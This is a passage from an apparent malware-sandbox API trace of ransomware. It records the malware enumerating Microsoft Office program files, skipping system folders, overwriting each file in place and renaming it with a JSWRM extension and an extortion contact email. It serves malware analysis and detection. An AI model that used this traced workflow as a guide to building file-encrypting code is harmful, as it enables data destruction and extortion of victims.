dwReserved1=0x23307e, cFileName="MINSBROAMINGPROXY.DLL", cAlternateFileName="MINSBR~1.DLL")) returned 1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2=".") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="..") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="...") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="windows") returned -1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="recovery") returned -1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="perflogs") returned -1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="documents and settings") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="$RECYCLE.BIN") returned 1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="system volume information") returned -1 [0135.949] lstrcmpiW (lpString1="MINSBROAMINGPROXY.DLL", lpString2="msocache") returned -1 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBROAMINGPROXY.DLL", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBROAMINGPROXY.DLL", cchWideChar=21, lpMultiByteStr=0x240ef8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MINSBROAMINGPROXY.DLL", lpUsedDefaultChar=0x0) returned 21 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBROAMINGPROXY.DLL", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0135.949] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MINSBROAMINGPROXY.DLL", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MINSBROAMINGPROXY.DLL", lpUsedDefaultChar=0x0) returned 21 [0135.949] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda6387a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefd42039, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefd68243, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfaea8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="misc.exe", cAlternateFileName="")) returned 1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2=".") returned 1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="..") returned 1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="...") returned 1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="windows") returned -1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="recovery") returned -1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="perflogs") returned -1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="documents and settings") returned 1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="$RECYCLE.BIN") returned 1 [0135.949] lstrcmpiW (lpString1="misc.exe", lpString2="system volume information") returned -1 [0135.950] lstrcmpiW (lpString1="misc.exe", lpString2="msocache") returned -1 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="misc.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="misc.exe", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="misc.exe", lpUsedDefaultChar=0x0) returned 8 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="misc.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="misc.exe", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="misc.exe", lpUsedDefaultChar=0x0) returned 8 [0135.950] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd295b9b9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd295b9b9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2a6698c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14a68, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MLCFG32.CPL", cAlternateFileName="")) returned 1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2=".") returned 1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="..") returned 1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="...") returned 1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="windows") returned -1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="recovery") returned -1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="perflogs") returned -1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="documents and settings") returned 1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="$RECYCLE.BIN") returned 1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="system volume information") returned -1 [0135.950] lstrcmpiW (lpString1="MLCFG32.CPL", lpString2="msocache") returned -1 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLCFG32.CPL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLCFG32.CPL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MLCFG32.CPL", lpUsedDefaultChar=0x0) returned 11 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLCFG32.CPL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MLCFG32.CPL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MLCFG32.CPL", lpUsedDefaultChar=0x0) returned 11 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.950] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.950] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MLCFG32.CPL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mlcfg32.cpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0135.951] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=84584) returned 1 [0135.951] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.951] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x14a60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x14a60, lpOverlapped=0x0) returned 1 [0135.959] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.959] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x14a60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x14a60, lpOverlapped=0x0) returned 1 [0135.959] CloseHandle (hObject=0x45c) returned 1 [0135.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MLCFG32.CPL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mlcfg32.cpl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MLCFG32.CPL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mlcfg32.cpl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.960] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda6387a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda6387a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25f87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MML2OMML.XSL", cAlternateFileName="")) returned 1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2=".") returned 1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="..") returned 1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="...") returned 1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="windows") returned -1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="recovery") returned -1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="perflogs") returned -1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="documents and settings") returned 1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="$RECYCLE.BIN") returned 1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="system volume information") returned -1 [0135.961] lstrcmpiW (lpString1="MML2OMML.XSL", lpString2="msocache") returned -1 [0135.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MML2OMML.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0135.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MML2OMML.XSL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MML2OMML.XSL", lpUsedDefaultChar=0x0) returned 12 [0135.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MML2OMML.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0135.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MML2OMML.XSL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MML2OMML.XSL", lpUsedDefaultChar=0x0) returned 12 [0135.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MML2OMML.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mml2omml.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0135.962] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=155527) returned 1 [0135.962] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.962] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x25f80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x25f80, lpOverlapped=0x0) returned 1 [0135.974] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.974] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x25f80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x25f80, lpOverlapped=0x0) returned 1 [0135.975] CloseHandle (hObject=0x45c) returned 1 [0135.975] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MML2OMML.XSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mml2omml.xsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MML2OMML.XSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\mml2omml.xsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.976] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda6387a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda6387a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b22ac67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x99678, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MORPH9.DLL", cAlternateFileName="")) returned 1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2=".") returned 1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="..") returned 1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="...") returned 1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="windows") returned -1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="recovery") returned -1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="perflogs") returned -1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="documents and settings") returned 1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="$RECYCLE.BIN") returned 1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="system volume information") returned -1 [0135.976] lstrcmpiW (lpString1="MORPH9.DLL", lpString2="msocache") returned -1 [0135.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MORPH9.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MORPH9.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MORPH9.DLL", lpUsedDefaultChar=0x0) returned 10 [0135.976] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MORPH9.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MORPH9.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MORPH9.DLL", lpUsedDefaultChar=0x0) returned 10 [0135.977] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1db7a09, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1db7a09, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4e71ae1, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x308a8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MPXINT.DLL", cAlternateFileName="")) returned 1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2=".") returned 1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="..") returned 1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="...") returned 1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="windows") returned -1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="recovery") returned -1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="perflogs") returned -1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="documents and settings") returned 1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="$RECYCLE.BIN") returned 1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="system volume information") returned -1 [0135.982] lstrcmpiW (lpString1="MPXINT.DLL", lpString2="msocache") returned -1 [0135.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXINT.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXINT.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPXINT.DLL", lpUsedDefaultChar=0x0) returned 10 [0135.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXINT.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0135.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MPXINT.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPXINT.DLL", lpUsedDefaultChar=0x0) returned 10 [0135.982] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xceac5c2a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xceac5c2a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe15188c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa7860, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSACC.OLB", cAlternateFileName="")) returned 1 [0135.982] lstrcmpiW (lpString1="MSACC.OLB", lpString2=".") returned 1 [0135.982] lstrcmpiW (lpString1="MSACC.OLB", lpString2="..") returned 1 [0135.982] lstrcmpiW (lpString1="MSACC.OLB", lpString2="...") returned 1 [0135.982] lstrcmpiW (lpString1="MSACC.OLB", lpString2="windows") returned -1 [0135.982] lstrcmpiW (lpString1="MSACC.OLB", lpString2="recovery") returned -1 [0135.983] lstrcmpiW (lpString1="MSACC.OLB", lpString2="perflogs") returned -1 [0135.983] lstrcmpiW (lpString1="MSACC.OLB", lpString2="documents and settings") returned 1 [0135.983] lstrcmpiW (lpString1="MSACC.OLB", lpString2="$RECYCLE.BIN") returned 1 [0135.983] lstrcmpiW (lpString1="MSACC.OLB", lpString2="system volume information") returned -1 [0135.983] lstrcmpiW (lpString1="MSACC.OLB", lpString2="msocache") returned -1 [0135.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACC.OLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0135.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACC.OLB", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACC.OLB", lpUsedDefaultChar=0x0) returned 9 [0135.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACC.OLB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0135.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACC.OLB", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACC.OLB", lpUsedDefaultChar=0x0) returned 9 [0135.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSACC.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msacc.olb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0135.984] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=686176) returned 1 [0135.984] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.984] ReadFile (in: hFile=0x45c, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0135.996] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.996] WriteFile (in: hFile=0x45c, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0135.997] CloseHandle (hObject=0x45c) returned 1 [0135.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSACC.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msacc.olb"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSACC.OLB.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msacc.olb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.998] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xce758538, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdf58154c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe1708762, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13b5440, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MSACCESS.EXE", cAlternateFileName="")) returned 1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2=".") returned 1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="..") returned 1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="...") returned 1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="windows") returned -1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="recovery") returned -1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="perflogs") returned -1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="documents and settings") returned 1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="$RECYCLE.BIN") returned 1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="system volume information") returned -1 [0135.998] lstrcmpiW (lpString1="MSACCESS.EXE", lpString2="msocache") returned -1 [0135.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0135.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.EXE", lpUsedDefaultChar=0x0) returned 12 [0135.998] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSACCESS.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 